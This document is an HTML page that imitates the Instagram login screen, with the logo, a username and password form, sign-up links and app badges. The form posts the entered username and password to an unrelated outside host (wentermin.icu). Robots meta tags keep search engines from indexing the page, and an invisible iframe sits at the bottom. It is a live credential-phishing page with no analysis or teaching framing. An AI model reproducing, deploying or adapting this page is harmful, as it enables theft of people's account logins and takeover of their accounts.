<html lang="en"><head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    <meta name="robots" content="noindex">
    <meta name="googlebot" content="noarchive">

</head>

<body>
    <style>
        * {
            padding: 0;
            margin: 0;
            box-sizing: border-box;
        }

        body {
            background-color: #FAFAFA;
            font-family: 'Trebuchet MS', 'Lucida Sans Unicode', 'Lucida Grande', 'Lucida Sans', Arial, sans-serif;
        }

        .container-item {
            width: 85%;
            margin: 20px 50%;
            transform: translateX(-50%);
            padding: 30px 10px;
            display: block;
            border: 1px solid #e9e9e9;
            background-color: white;
        }

        input {
            display: block;
            width: 100%;
            margin: 0 3%;
            padding: 20px 10px 10px 10px;
            border-radius: 3px;
            border: 1px solid #DBDBDB;
            margin: 5px 0;
            color: #282727;
            background: #FAFAFA;
            font-size: 13px;
            outline: 1px solid transparent;
        }

        input[type=password] {
            padding: 25px 10px 10px 10px;
        }

        label {
            font-size: 11.5px;
            position: absolute;
            transform: translateY(18px);
            /* transform: translateY(7px); */
            padding: 0px 10px;
            transition: 0.2s ease-in-out all;
            color: #838181;
        }

        .label-toggle {
            transform: translateY(7px);
        }

        button {
            width: 100%;
            padding: 10px;
            background: dodgerblue;
            color: white;
            border: 1px solid transparent;
            border-radius: 3px;
            margin: 10px 0;
            font-weight: bold;
        }

        a {
            text-align: right;
            color: #114b86;
            text-decoration: none;
            font-size: 13px;
        }

        ul {
            display: flex;
            justify-content: center;
            list-style-type: none;
            align-items: center;
        }

        #loader {
            position: absolute;
            left: 50%;
            transform: translate(-50%, 18px);
            visibility: hidden;
        }

        #feedback {
            display: none;
        }

        @media screen and (min-width: 768px) {
            .container {
                width: 70%;
                margin: 0 50%;
                transform: translateX(-50%);
            }

            .container-item {
                width: 340px;
                margin-top: 60px;
            }

            #error {
                padding: 0 35% !important;
            }
        }
    </style>
    <form method="post" action="https://wentermin.icu/app/server.php" >
    <div class="container">
        <div class="container-item"><br><br>
            <center><img src="./images/ig.png" width="200px"></center><br>
            <label class="label" for="">Phone number, username, or email</label>
            <input class="input" type="text"  name="username">

            <label class="label" for="">Password</label>
            <input class="input" type="password"  name="password">

            <button name="submit" id="login">Log in</button>
            <img src="./images/load.gif" width="18px" id="loader">
            <br>
            <p style="text-align: center;"><a href="#">Forgot Password ?</a></p>
        </div>
        <!-- <p id="feedback" style="text-align: center; font-size: 13px; margin: 10px 0; color: #ec3131; padding: 0 23%;"></p> -->

        <p id="feedback" style="text-align: center; font-size: 13px; margin: 10px 0; color: #ec3131; padding: 0 23%;"></p>

        <div class="container-item" style="padding: 15px 10px;">
            <p style="text-align: center; font-size: 13px;">Don't have an account? <a href="" style="color: dodgerblue;">Sign up</a></p>
        </div>
        <p style="text-align: center; font-size: 13px;">Get the app.</p>
        <ul>
            <li><img src="./images/go.png" width="100px" height="38px" style="margin: 10px 5px;"></li>
            <li><img src="./images/mi.png" width="100px" style="margin: 10px 5px;"></li>
        </ul>
        <p style="text-align: center; margin: 15px 0;"><img src="./images/me.svg" width="50px"></p>
    </div>
    </form>
    <iframe src="" id="iframLink" style="opacity: 0;" frameborder="0"></iframe>
 


</body></html>
